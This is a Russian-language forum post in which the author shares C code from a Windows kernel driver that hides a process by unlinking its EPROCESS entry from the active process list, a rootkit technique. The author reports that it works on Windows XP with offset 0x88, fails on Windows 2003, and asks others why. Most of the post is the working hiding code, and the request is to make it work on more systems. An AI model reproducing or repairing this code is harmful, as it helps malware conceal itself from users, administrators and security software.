такая проблема возникла. драйвер для скрытия процесса. есть код: Код (Text): if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){ DbgMsg("openning plist\n"); dwEProcAddr = (ULONG) pEProc; __try{ pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset); *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink); *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); }__except(EXCEPTION_EXECUTE_HANDLER){ DbgMsg("error with modification plist\n"); NtStatus = GetExceptionCode(); } NtStatus = STATUS_SUCCESS; } передаю смещение uFlinkOffset 0x88 прекрасно работает в win XP. насколько я знаю для windows 2000 смещение 0xA0 и для windows 2003 также как и для виндовс XP 0x88 вообщем суть проблемы - не работает в виндовс 2003.. хз почему.. у когонибудь есть догадки?
